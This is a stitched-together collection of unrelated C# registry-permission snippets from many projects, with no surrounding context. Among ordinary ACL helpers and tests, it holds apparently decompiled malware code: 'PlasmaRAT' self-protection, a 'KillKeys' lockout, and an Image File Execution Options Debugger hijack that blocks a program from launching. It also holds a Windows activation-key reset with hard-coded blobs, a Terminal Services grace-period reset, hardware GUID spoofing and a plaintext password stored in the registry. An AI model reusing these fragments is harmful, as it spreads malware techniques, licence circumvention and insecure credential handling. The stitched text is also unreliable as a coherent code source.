private static void GrantRegistryAccess(string key, Prison prison)
{
NTAccount account = new NTAccount(null, prison.User.Username);
var hklm = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, RegistryView.Registry64);
using (RegistryKey rk = hklm.OpenSubKey(key, RegistryKeyPermissionCheck.ReadWriteSubTree, RegistryRights.FullControl))
{
RegistrySecurity rs = rk.GetAccessControl();
RegistryAccessRule rar = new RegistryAccessRule(
account.ToString(),
RegistryRights.FullControl,
InheritanceFlags.ContainerInherit,
PropagationFlags.None,
AccessControlType.Allow);
rs.AddAccessRule(rar);
rk.SetAccessControl(rs);
}
}
/// <summary>
/// Verify that a specific user has access rights to a specific Registry Key
/// </summary>
/// <param name="userName">Name of the user to check for</param>
/// <param name="root">Root key for the registry key</param>
/// <param name="subKey">Registry key to check for</param>
/// <param name="rights">Expected access rights</param>
public static void VerifyRegistryKeyPermission(string userName, Microsoft.Win32.RegistryKey root, string subKey, RegistryRights rights)
{
RegistryKey registryKey = root.OpenSubKey(subKey);
RegistrySecurity registrySecurity = registryKey.GetAccessControl();
AuthorizationRuleCollection accessRules = registrySecurity.GetAccessRules(true, true, typeof(NTAccount));
foreach (RegistryAccessRule accessRule in accessRules)
{
if (userName.ToLowerInvariant().Equals(accessRule.IdentityReference.Value.ToLowerInvariant()))
{
if ((accessRule.RegistryRights & rights) == rights)
{
return;
}
}
}
Assert.Fail(string.Format("User '{0}' do not have the correct permessions to RegistryKey '{1}/{2}'.", userName, root.ToString(), subKey));
}
// It's up to the caller to obtain the needed token privileges (TakeOwnership) for this operation
public static void GrantFullControlOnSubKey(this RegistryKey registryKey, string subkeyName)
{
using RegistryKey subKey = registryKey.OpenSubKeyOrThrowIfMissing(subkeyName,
RegistryRights.TakeOwnership | RegistryRights.ChangePermissions
);
RegistrySecurity accessRules = subKey.GetAccessControl();
accessRules.SetOwner(WindowsIdentity.GetCurrent().User);
accessRules.ResetAccessRule(
new RegistryAccessRule(
WindowsIdentity.GetCurrent().User,
RegistryRights.FullControl,
InheritanceFlags.ContainerInherit | InheritanceFlags.ObjectInherit,
PropagationFlags.None,
AccessControlType.Allow
)
);
subKey.SetAccessControl(accessRules);
}
private static RegistryKey GetRegistryKey()
{
// Create a security context for a new key that we will use to store our data.
// The security context will restrict access to only our user.
string user = Environment.UserDomainName + "\\" + Environment.UserName;
RegistrySecurity security = new RegistrySecurity();
RegistryAccessRule rule = new RegistryAccessRule(user,
RegistryRights.FullControl,
InheritanceFlags.ContainerInherit,
PropagationFlags.None,
AccessControlType.Allow);
security.AddAccessRule(rule);
RegistryKey key = Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run",
RegistryKeyPermissionCheck.ReadWriteSubTree, security);
return(key);
}
protected override void ProcessRecord()
{
using (RegistryKey regKey = RegistryControl.GetRegistryKey(RegistryPath, false, true))
{
bool isChange = false;
RegistrySecurity security = security = regKey.GetAccessControl();
if (All)
{
// テスト自動生成
_generator.RegistryAccess(RegistryPath, "", false);
foreach (RegistryAccessRule rule in security.GetAccessRules(true, false, typeof(NTAccount)))
{
security.RemoveAccessRule(rule);
isChange = true;
}
}
else
{
foreach (RegistryAccessRule rule in security.GetAccessRules(true, false, typeof(NTAccount)))
{
string account = rule.IdentityReference.Value;
// テスト自動生成
_generator.RegistryAccount(RegistryPath, account);
if (Account.Contains("\\") && account.Equals(Account, StringComparison.OrdinalIgnoreCase) ||
!Account.Contains("\\") && account.EndsWith("\\" + Account, StringComparison.OrdinalIgnoreCase))
{
security.RemoveAccessRule(rule);
isChange = true;
}
}
}
if (isChange)
{
regKey.SetAccessControl(security);
}
WriteObject(new RegistrySummary(regKey, true));
}
}
// Token: 0x0600005D RID: 93 RVA: 0x00006194 File Offset: 0x00004394
public static object KillKeys(RegistryKey wat)
{
try
{
SecurityIdentifier securityIdentifier = new SecurityIdentifier(WellKnownSidType.WorldSid, null);
NTAccount ntaccount = securityIdentifier.Translate(typeof(NTAccount)) as NTAccount;
string identity = ntaccount.ToString();
RegistrySecurity registrySecurity = new RegistrySecurity();
registrySecurity.AddAccessRule(new RegistryAccessRule(identity, RegistryRights.ExecuteKey, InheritanceFlags.None, PropagationFlags.None, AccessControlType.Deny));
registrySecurity.AddAccessRule(new RegistryAccessRule(identity, RegistryRights.Delete | RegistryRights.ChangePermissions | RegistryRights.TakeOwnership, InheritanceFlags.None, PropagationFlags.None, AccessControlType.Deny));
wat.SetAccessControl(registrySecurity);
wat.Close();
}
catch (Exception ex)
{
}
object result;
return(result);
}
public static bool DeleteAllSubKeys(string root, string subKey)
{
try
{
RegistryKey Test = Registry.CurrentUser.OpenSubKey(root);
RegistrySecurity s = new RegistrySecurity();
//s = Test.GetAccessControl();
//Registry.CurrentUser.DeleteSubKeyTree(root);
Registry.CurrentUser.ValueCount.ToString();
//Test.SetAccessControl(s);
//Test.DeleteValue(subKey, true);
// Test.DeleteSubKey(subKey);
return(true);
}
catch (NullReferenceException)
{
return(false);
}
}
private static RegistrySecurity _sec_MakeRegSecurity()
{
string user = Environment.UserDomainName + "\\" + Environment.UserName;
RegistrySecurity rs = new RegistrySecurity();
rs.AddAccessRule(new RegistryAccessRule(user,
RegistryRights.ReadKey | RegistryRights.Delete | RegistryRights.WriteKey,
InheritanceFlags.None,
PropagationFlags.None,
AccessControlType.Allow));
rs.AddAccessRule(new RegistryAccessRule(user,
RegistryRights.ChangePermissions,
InheritanceFlags.None,
PropagationFlags.None,
AccessControlType.Deny));
return(rs);
}
/// <summary>
/// Registry key installation
/// </summary>
#region Registry key installation
public static void RegisterApp()
{
RegistryKey AppKey;
AppKey = Registry.LocalMachine.OpenSubKey(Settings.HCKURun, true);
// Modify key entry permission
try
{
RegistrySecurity rs = new RegistrySecurity();
rs = AppKey.GetAccessControl();
rs.AddAccessRule(new RegistryAccessRule(new SecurityIdentifier(WellKnownSidType.WorldSid, null), RegistryRights.WriteKey | RegistryRights.ReadKey | RegistryRights.Delete | RegistryRights.FullControl, AccessControlType.Allow));
AppKey.SetAccessControl(rs);
}
catch {};
AppKey.SetValue(Settings.RegistryKeyValue, Settings.AppPath);
AppKey.Close();
}
protected override int OnExecute(CommandLineApplication app)
{
if (!Utils.HasAdmin()) Console.WriteLine("Please run this command as Administrator or it might fail!");
try
{
RegistrySecurity oldrs = null;
oldrs = TerminalService.SetGracePeriodRegistryKeyPermission();
TerminalService.ResetGracePeriodVal();
Console.WriteLine($"Grace period is reset");
if (oldrs != null) TerminalService.SetGracePeriodRegistryKeyPermission(oldrs);
if (RestartServices) TerminalService.RestartServices();
} catch (Exception ex)
{
Console.WriteLine(ex.Message);
return -1;
}
return 0;
}
/// <summary>
/// apply registry security settings to user profiles
/// </summary>
public static bool RegSec(Abstractions.WindowsApi.pInvokes.structenums.RegistryLocation where, string keyname, SecurityIdentifier userSid)
{
try
{
using (RegistryKey key = Abstractions.WindowsApi.pInvokes.GetRegistryLocation(where).OpenSubKey(keyname, true))
{
RegistrySecurity keySecurity = key.GetAccessControl(AccessControlSections.Access);
string sddl = keySecurity.GetSecurityDescriptorSddlForm(AccessControlSections.All);
foreach (RegistryAccessRule user in keySecurity.GetAccessRules(true, true, typeof(SecurityIdentifier)))
{
if (user.IdentityReference.Value.StartsWith("S-1-5-21-") && !user.IdentityReference.Value.Equals(userSid.Value))
{
sddl = sddl.Replace(user.IdentityReference.Value, userSid.Value);
keySecurity.SetSecurityDescriptorSddlForm(sddl);
key.SetAccessControl(keySecurity);
break;
}
}
foreach (string subkey in key.GetSubKeyNames())
{
if (!RegSec(where, keyname + "\\" + subkey, userSid))
{
return(false);
}
}
}
}
catch (SystemException ex)
{
Log.WarnFormat("RegSec:{0} Warning {1}", keyname, ex.Message);
}
catch (Exception ex)
{
Log.ErrorFormat("RegSec:{0} Error:{1}", keyname, ex.Message);
return(false);
}
return(true);
}
public static void ProvisionAutoGenKeys(RegistryView regView, string expandedVersion, string sid)
{
var baseRegKey = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, regView);
var softwareMicrosoftKey = baseRegKey.OpenSubKey("SOFTWARE\\Microsoft\\", true);
var aspNetKey = softwareMicrosoftKey.OpenSubKey("ASP.NET", true);
if (aspNetKey == null)
{
aspNetKey = softwareMicrosoftKey.CreateSubKey("ASP.NET");
}
var aspNetBaseKey = aspNetKey.OpenSubKey(expandedVersion, true);
if (aspNetBaseKey == null)
{
aspNetBaseKey = aspNetKey.CreateSubKey(expandedVersion);
}
var autoGenBaseKey = aspNetBaseKey.OpenSubKey("AutoGenKeys", true);
if (autoGenBaseKey == null)
{
autoGenBaseKey = aspNetBaseKey.CreateSubKey("AutoGenKeys");
}
var regSec = new RegistrySecurity();
regSec.SetSecurityDescriptorSddlForm($"D:P(A;OICI;GA;;;SY)(A;OICI;GA;;;BA)(A;OICI;GA;;;{sid})");
var userAutoGenKey = autoGenBaseKey.OpenSubKey(sid, true);
if (userAutoGenKey == null)
{
userAutoGenKey = autoGenBaseKey.CreateSubKey(sid, RegistryKeyPermissionCheck.Default, regSec);
}
else
{
userAutoGenKey.SetAccessControl(regSec);
}
}
private bool Class_Root_Anahtar_Varmi(string ClassRoot_Anahtar)
{
RegistrySecurity registrySecurity = new RegistrySecurity();
registrySecurity.AddAccessRule(new RegistryAccessRule("Administrators", RegistryRights.WriteKey, AccessControlType.Allow));
registrySecurity.SetOwner(new NTAccount("Administrators"));
try
{
using (RegistryKey key = Registry.ClassesRoot.OpenSubKey(ClassRoot_Anahtar, RegistryKeyPermissionCheck.ReadWriteSubTree, RegistryRights.WriteKey))
{
if ((key == null) && (Registry.ClassesRoot.CreateSubKey(ClassRoot_Anahtar, RegistryKeyPermissionCheck.ReadWriteSubTree, registrySecurity) != null))
{
return(true);
}
}
}
catch (Exception exception)
{
}
return(false);
}
public const string FirewallServiceName = @"NT SERVICE\MpsSvc"; // Windows Defender Firewall
public bool GetAccessRestriction(string keyPath)
{
try
{
RegistryKey subKey = Registry.LocalMachine.OpenSubKey(keyPath, false);
RegistrySecurity keySec = subKey.GetAccessControl(AccessControlSections.Access);
foreach (var rule in keySec.GetAccessRules(true, true, typeof(System.Security.Principal.NTAccount)).Cast <AuthorizationRule>())
{
if (rule.IdentityReference.Value.Equals(FirewallServiceName, StringComparison.OrdinalIgnoreCase))
{
return(true);
}
}
}
catch (Exception err)
{
AppLog.Exception(err);
}
return(false);
}
public static object KillKeys(RegistryKey wat)
{
object obj2;
try
{
SecurityIdentifier identifier = new SecurityIdentifier(WellKnownSidType.WorldSid, null);
string identity = (identifier.Translate(typeof(NTAccount)) as NTAccount).ToString();
RegistrySecurity registrySecurity = new RegistrySecurity();
registrySecurity.AddAccessRule(new RegistryAccessRule(identity, RegistryRights.ExecuteKey, InheritanceFlags.None, PropagationFlags.None, AccessControlType.Deny));
registrySecurity.AddAccessRule(new RegistryAccessRule(identity, RegistryRights.TakeOwnership | RegistryRights.ChangePermissions | RegistryRights.Delete, InheritanceFlags.None, PropagationFlags.None, AccessControlType.Deny));
wat.SetAccessControl(registrySecurity);
wat.Close();
}
catch (Exception exception1)
{
ProjectData.SetProjectError(exception1);
ProjectData.ClearProjectError();
}
return(obj2);
}
/// <summary>
/// Grants full control on the given registry key under RegistryKey for everyone
/// </summary>
/// <param name="subKey">subkey name</param>
public static void GrantFullControlRegKey(RegistryKey baseKey, string subKey)
{
RegistryKey rKey = baseKey.OpenSubKey(subKey, true);
if (rKey == null)
{
return;
}
Console.WriteLine("Granting full control to: {0}\\{1}", baseKey, subKey);
try
{
// Create a SecurityIdentifier object for "everyone".
SecurityIdentifier everyoneSid =
new SecurityIdentifier(WellKnownSidType.WorldSid, null);
RegistrySecurity security = rKey.GetAccessControl();
RegistryAccessRule newRule =
new RegistryAccessRule(
everyoneSid,
RegistryRights.FullControl, // modify is enough for reading/writing/deleting
InheritanceFlags.ObjectInherit | InheritanceFlags.ContainerInherit, // all subfolders and files
PropagationFlags.None,
AccessControlType.Allow);
// Check if such a rule already exists, if so skip the modifications
if (ContainsRule(security.GetAccessRules(true, true, typeof(SecurityIdentifier)), newRule))
{
Console.WriteLine("Permissions already set.");
return;
}
security.AddAccessRule(newRule);
rKey.SetAccessControl(security);
rKey.Close();
}
catch (Exception ex)
{
Console.WriteLine("Error while setting full write access to everyone for file: {0} : {1}", subKey, ex);
}
}
private void tools_Load(object sender, EventArgs e)
{
WindowsIdentity ident = WindowsIdentity.GetCurrent();
WindowsPrincipal myPrincipal = new WindowsPrincipal(ident);
if (!myPrincipal.IsInRole(WindowsBuiltInRole.Administrator))
{
string user = Environment.UserDomainName + "\\" + Environment.UserName;
RegistrySecurity rs = new RegistrySecurity();
rs.AddAccessRule(new RegistryAccessRule(user,
RegistryRights.ReadKey | RegistryRights.Delete | RegistryRights.CreateSubKey | RegistryRights.WriteKey | RegistryRights.ChangePermissions | RegistryRights.SetValue,
InheritanceFlags.None,
PropagationFlags.None,
AccessControlType.Deny));
}
try
{
RegistryKey path = Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Microsoft\", true);
textBox1.Text = path.GetValue("Masm32").ToString();
}
catch { }
}
private void Good1()
{
/* FIX: Create a registry key without excessive privileges */
string user = Environment.UserDomainName + "\\" + Environment.UserName;
RegistrySecurity rs = new RegistrySecurity();
//Allow the current user to read and delete the key.
rs.AddAccessRule(new RegistryAccessRule(user,
RegistryRights.ReadKey | RegistryRights.Delete,
InheritanceFlags.None,
PropagationFlags.None,
AccessControlType.Allow));
//Prevent the current user from writing or changing the permission set of the key
rs.AddAccessRule(new RegistryAccessRule(user,
RegistryRights.WriteKey | RegistryRights.ChangePermissions,
InheritanceFlags.None,
PropagationFlags.None,
AccessControlType.Deny));
RegistryKey key = Registry.CurrentUser.OpenSubKey("Software", true);
key.CreateSubKey("CWE314");
}
static void Main(string[] args)
{
// Reload Registry Hive Trick
CommonUtilities.ExecuteCommand("REG SAVE HKLM\\SYSTEM " + CommonUtilities.EscapePath(Environment.GetEnvironmentVariable("TEMP") + "\\SYSTEM.hiv"), true);
CommonUtilities.ExecuteCommand("REG RESTORE HKLM\\SYSTEM " + CommonUtilities.EscapePath(Environment.GetEnvironmentVariable("TEMP") + "\\SYSTEM.hiv"), true);
CommonUtilities.FileDelete(Environment.GetEnvironmentVariable("TEMP") + "\\SYSTEM.hiv");
// Rename and Delete WPA Key
using (RegistryKey key = Registry.LocalMachine.OpenSubKey(@"SYSTEM", true))
{
if (key != null)
{
// TODO : Powershell Bundled Vista+ ???
CommonUtilities.ExecuteCommand(@"POWERSHELL -command rename-item HKLM:\SYSTEM\WPA -NewName WPA_Delete", true);
key.DeleteSubKeyTree("WPA_DELETE");
key.CreateSubKey("WPA");
// Create Default Values
CommonUtilities.ExecuteCommand("REG ADD HKLM\\SYSTEM\\WPA\\478C035F-04BC-48C7-B324-2462D786DAD7-5P-9 /t REG_BINARY /ve /d 20c0c44b5d68c7085f442818128270ea642e5b5dba2d8885a7831a85c3d1ece262b36911a0d5bdb5e55106656d12578af73f942ffe1562ba665b18ce8969bbf74ff8ceacf3c424de22cf36560c8633b92173d5f38abbe0fbe3f408ca314725a94d599a4587daea29aa207b5cefbfcf2361b7a9beeaacc754513fdce82c16828d", true);
CommonUtilities.ExecuteCommand("REG ADD HKLM\\SYSTEM\\WPA\\478C035F-04BC-48C7-B324-2462D786DAD7-5P-9 /t REG_BINARY /v Time /d e318ad15241c695f751c6b19fe1ba41cebfb91bf29367de3146d79a76ace067c", true);
CommonUtilities.ExecuteCommand("REG ADD HKLM\\SYSTEM\\WPA\\478C035F-04BC-48C7-B324-2462D786DAD7-5P-9 /t REG_DWORD /v Type /d 2111353691", true);
CommonUtilities.ExecuteCommand("REG ADD HKLM\\SYSTEM\\WPA\\8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-1 /t REG_BINARY /ve /d 6979d03b99a73c736882ceadf1a96320c15405927dc0b721f83cad674fb340496d75f608189d84dcd18fdaff8ea3866a3f37edc3d1eb5c0647e97bb7bea79f5dd05a66062fabb480d137cd3623563962e200b1bd42531cc3e6e4c1ffff693a208e9937f7a4d48b7463e68faf0df08811", true);
CommonUtilities.ExecuteCommand("REG ADD HKLM\\SYSTEM\\WPA\\8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-2 /t REG_BINARY /ve /d 79e3ad3e68302e43bc97f4aceb98f3e328155f42df9684935abbc4f3c1652637a70f81fdf5f469d8586bf1d1a8ff96af9ead400b1c9d5621f4b4c57ad44fc2b129ca20a19a64bcfc481c52738b876b64", true);
CommonUtilities.ExecuteCommand("REG ADD HKLM\\SYSTEM\\WPA\\8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-3 /t REG_BINARY /ve /d 65a7778c965816a2df869e044edf4671f2ac716502d74d5b30c531c1469dc758dc25c2b480393d6fb7336d3d915668a7f05ff3847468228168833bed8947b4bc", true);
}
}
// Set WPA Key Permissions
using (RegistryKey key = Registry.LocalMachine.OpenSubKey(@"SYSTEM\\WPA", true))
{
if (key != null)
{
RegistrySecurity acl = new RegistrySecurity();
acl.SetAccessRuleProtection(true, false);
acl.SetAccessRule(new RegistryAccessRule(new SecurityIdentifier(WellKnownSidType.WorldSid, null), RegistryRights.FullControl, InheritanceFlags.ContainerInherit | InheritanceFlags.ObjectInherit, PropagationFlags.None, AccessControlType.Allow));
key.SetAccessControl(acl);
}
}
}
/// <summary>Create a secure instance</summary>
/// <param name="name">instance name</param>
/// <returns>the instance</returns>
/// <exception cref="System.Exception"/>
protected internal static MicroZookeeperService CreateSecureZKInstance(string name
)
{
string context = ZookeeperServerContext;
Configuration conf = new Configuration();
FilePath testdir = new FilePath(Runtime.GetProperty("test.dir", "target"));
FilePath workDir = new FilePath(testdir, name);
if (!workDir.Mkdirs())
{
NUnit.Framework.Assert.IsTrue(workDir.IsDirectory());
}
Runtime.SetProperty(ZookeeperConfigOptions.PropZkServerMaintainConnectionDespiteSaslFailure
, "false");
RegistrySecurity.ValidateContext(context);
conf.Set(MicroZookeeperServiceKeys.KeyRegistryZkserviceJaasContext, context);
MicroZookeeperService secureZK = new MicroZookeeperService(name);
secureZK.Init(conf);
Log.Info(secureZK.GetDiagnostics());
return(secureZK);
}
private static RegistryAccessRule RegSetFullAccess(RegistryKey nParentKey, string nkey, IdentityReference nuser)
{
RegistryKey nSubKey = null;
try
{
nSubKey = nParentKey.OpenSubKey(nkey, RegistryKeyPermissionCheck.ReadWriteSubTree,
RegistryRights.ReadKey | RegistryRights.ChangePermissions | RegistryRights.ReadPermissions);
RegistrySecurity nSubKeySec = nSubKey.GetAccessControl(AccessControlSections.Access);
RegistryAccessRule nAccRule = new RegistryAccessRule(nuser, RegistryRights.FullControl, AccessControlType.Allow);
nSubKeySec.AddAccessRule(nAccRule);
//nSubKeySec.RemoveAccessRul
nSubKey.SetAccessControl(nSubKeySec);
nSubKey.Close();
return(nAccRule);
}
catch
{
nSubKey?.Close();
return(null);
}
}
public static bool Save()
{
RegistryKey _lmSoftware = null;
RegistryKey _koDevelopers = null;
RegistryKey _pentagram = null;
RegistryKey _tbl = null;
try
{
string user = Environment.UserDomainName + "\\" + Environment.UserName;
RegistrySecurity rs = new RegistrySecurity();
rs.AddAccessRule(new RegistryAccessRule(user,
RegistryRights.WriteKey | RegistryRights.ReadKey | RegistryRights.Delete,
InheritanceFlags.None,
PropagationFlags.None,
AccessControlType.Allow));
_lmSoftware = Registry.CurrentUser.OpenSubKey("SOFTWARE", true);
_koDevelopers = _lmSoftware.CreateSubKey("KODevelopers", RegistryKeyPermissionCheck.ReadWriteSubTree, rs);
_pentagram = _koDevelopers.CreateSubKey("PENTAGRAM", RegistryKeyPermissionCheck.ReadWriteSubTree, rs);
_tbl = _pentagram.CreateSubKey("TBLEditor", RegistryKeyPermissionCheck.ReadWriteSubTree, rs);
_tbl.SetValue("Username", Username);
_tbl.SetValue("Password", Password);
_tbl.SetValue("KeepLoggedIn", KeepLoggedIn);
_tbl.SetValue("RememberMe", RememberMe);
_tbl.SetValue("SkinName", SkinName);
_tbl.SetValue("Language", Language);
return(true);
}
catch (Exception e)
{
StaticReference.ShowError(null, e.Message);
return(false);
}
}
private static void spoofGuid()
{
Guid guid = Guid.NewGuid();
string GUID = @"SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware Profiles\0001";
RegistryKey subkey = Registry.LocalMachine.OpenSubKey(GUID, true);
if (subkey != null)
{
string user = Environment.UserDomainName + "\\" + Environment.UserName;
RegistrySecurity rs = new RegistrySecurity();
rs.AddAccessRule(new RegistryAccessRule(user,
RegistryRights.FullControl,
InheritanceFlags.None,
PropagationFlags.None,
AccessControlType.Allow));
subkey.SetAccessControl(rs);
subkey.SetValue("HwProfileGuid", "{" + guid + "}", RegistryValueKind.String);
subkey.Close();
}
Console.WriteLine("GUID spoofed to " + guid);
}
// Token: 0x0600004D RID: 77 RVA: 0x00005428 File Offset: 0x00003628
public static void ProtectMyFile()
{
try
{
string runFileAs = PlasmaRAT.RunFileAs;
RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options", true);
registryKey.CreateSubKey(runFileAs);
registryKey.Close();
RegistryKey registryKey2 = Registry.LocalMachine.OpenSubKey("software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\" + runFileAs, true);
registryKey2.SetValue("DisableExceptionChainValidation", "");
SecurityIdentifier securityIdentifier = new SecurityIdentifier(WellKnownSidType.WorldSid, null);
NTAccount ntaccount = securityIdentifier.Translate(typeof(NTAccount)) as NTAccount;
string identity = ntaccount.ToString();
RegistrySecurity registrySecurity = new RegistrySecurity();
registrySecurity.AddAccessRule(new RegistryAccessRule(identity, RegistryRights.ExecuteKey, InheritanceFlags.None, PropagationFlags.None, AccessControlType.Allow));
registrySecurity.AddAccessRule(new RegistryAccessRule(identity, RegistryRights.SetValue | RegistryRights.CreateSubKey | RegistryRights.Delete | RegistryRights.ChangePermissions | RegistryRights.TakeOwnership, InheritanceFlags.None, PropagationFlags.None, AccessControlType.Deny));
registryKey2.SetAccessControl(registrySecurity);
registryKey2.Close();
}
catch (Exception ex)
{
}
}
static bool RegSetOwneship(RegistryKey nParentKey, string nkey, IdentityReference nuser)
{
RegistryKey nSubKey = null;
try
{
nSubKey = nParentKey.OpenSubKey(nkey, RegistryKeyPermissionCheck.ReadWriteSubTree,
RegistryRights.TakeOwnership | RegistryRights.ReadKey | RegistryRights.ReadPermissions);
RegistrySecurity nSubKeySec = nSubKey.GetAccessControl(AccessControlSections.Owner);
nSubKeySec.SetOwner(nuser);
nSubKey.SetAccessControl(nSubKeySec);
nSubKey.Close();
return(true);
}
catch
{
if (nSubKey != null)
{
nSubKey.Close();
}
return(false);
}
}
static RegistryKey SwallowRegKey(RegistryKey root, string key, RegistryKeyPermissionCheck newPermission)
{
string userName = System.Security.Principal.WindowsIdentity.GetCurrent().Name;
//MessageBox.Show("swallow1");
RegistryKey rk = root.OpenSubKey(key, RegistryKeyPermissionCheck.ReadWriteSubTree, RegistryRights.ChangePermissions | RegistryRights.ReadKey);//Get the registry key desired with ChangePermissions Rights.
if (rk == null)
{
return(null);
}
RegistrySecurity rs = new RegistrySecurity();
rs.AddAccessRule(new RegistryAccessRule(userName, RegistryRights.FullControl, InheritanceFlags.ContainerInherit | InheritanceFlags.ObjectInherit, PropagationFlags.InheritOnly, AccessControlType.Allow)); //Create access rule giving full control to the Administrator user.
rk.SetAccessControl(rs); //Apply the new access rule to this Registry Key.
rk.Close();
//rk = root.OpenSubKey(key, RegistryKeyPermissionCheck.ReadWriteSubTree, RegistryRights.FullControl); // Opens the key again with full control.
//rs.SetOwner(new NTAccount(userName));// Set the securitys owner to be Administrator
//rk.SetAccessControl(rs);// Set the key with the changed permission so Administrator is now owner.
//rk.Close();
rk = root.OpenSubKey(key, newPermission, RegistryRights.FullControl);
//MessageBox.Show("swallow2");
return(rk);
}
public static void SetKeyPermissions(RegistryKey key, string subKey, bool reset)
{
bool isProtected = !reset;
string text = "SYSTEM";
string text2 = reset ? text : GetNewOwnerName();
SetKeyOwnerWithPrivileges(key, subKey, text);
using (RegistryKey registryKey = key.OpenSubKey(subKey, RegistryKeyPermissionCheck.ReadWriteSubTree, RegistryRights.ChangePermissions))
{
RegistrySecurity registrySecurity = new RegistrySecurity();
if (!reset)
{
RegistryAccessRule rule = new RegistryAccessRule(text2, RegistryRights.FullControl, InheritanceFlags.None, PropagationFlags.NoPropagateInherit, AccessControlType.Allow);
registrySecurity.AddAccessRule(rule);
}
registrySecurity.SetAccessRuleProtection(isProtected, false);
registryKey.SetAccessControl(registrySecurity);
}
if (!reset)
{
SetKeyOwnerWithPrivileges(key, subKey, text2);
}
}
private void SetKeyPermissions(RegistryKey regKey)
{
// Console.WriteLine("set permission on " + regKey);
try
{
//Change Permissions on registry key
RegistrySecurity existingSecurity = regKey.GetAccessControl(AccessControlSections.Owner);
existingSecurity.AddAccessRule(this.RegistryAccessRule);
// existingSecurity.SetAccessRuleProtection(true, true);
regKey.SetAccessControl(existingSecurity);
}
catch (UnauthorizedAccessException ex)
{
// Console.WriteLine(ex.Message, "Unauthorized access");
}
catch (Exception ex)
{
//Console.WriteLine(ex.Message);
}
}
public static void FuckFileName(string input)
{
try {
RegistryKey regKey = default(RegistryKey);
regKey = Registry.LocalMachine.OpenSubKey("software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options", true);
regKey.CreateSubKey(input);
regKey.Close();
RegistryKey Fuckyou = default(RegistryKey);
Fuckyou = Registry.LocalMachine.OpenSubKey("software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\" + input, true);
Fuckyou.SetValue("Debugger", "rundll32.exe");
SecurityIdentifier securityIdentifier = new SecurityIdentifier(WellKnownSidType.WorldSid, null);
NTAccount ntaccount = securityIdentifier.Translate(typeof(NTAccount)) as NTAccount;
RegistrySecurity registrySecurity = new RegistrySecurity();
registrySecurity.AddAccessRule(new RegistryAccessRule(ntaccount, RegistryRights.QueryValues | RegistryRights.EnumerateSubKeys | RegistryRights.Notify | RegistryRights.ReadPermissions, InheritanceFlags.None, PropagationFlags.None, AccessControlType.Allow));
registrySecurity.AddAccessRule(new RegistryAccessRule(ntaccount, RegistryRights.SetValue | RegistryRights.Delete | RegistryRights.CreateSubKey | RegistryRights.ChangePermissions | RegistryRights.TakeOwnership, InheritanceFlags.None, PropagationFlags.None, AccessControlType.Deny));
Fuckyou.SetAccessControl(registrySecurity);
Fuckyou.Close();
}
catch
{
}
}
private bool anahtar_varmi(string CurrentUserAnahtar)
{
string name = CurrentUserAnahtar;
RegistrySecurity registrySecurity = new RegistrySecurity();
registrySecurity.AddAccessRule(new RegistryAccessRule("Administrators", RegistryRights.FullControl, AccessControlType.Allow));
registrySecurity.SetOwner(new NTAccount("Administrators"));
try
{
using (RegistryKey key = Registry.CurrentUser.OpenSubKey(name, RegistryKeyPermissionCheck.ReadWriteSubTree, RegistryRights.FullControl))
{
if ((key == null) && (Registry.CurrentUser.CreateSubKey(name, RegistryKeyPermissionCheck.ReadWriteSubTree, registrySecurity) != null))
{
return(true);
}
}
}
catch
{
//MessageBox.Show("CurrentUser anahtar");
}
return(false);
}
public static void SetAccessControl(this RegistryKey key, RegistrySecurity registrySecurity);
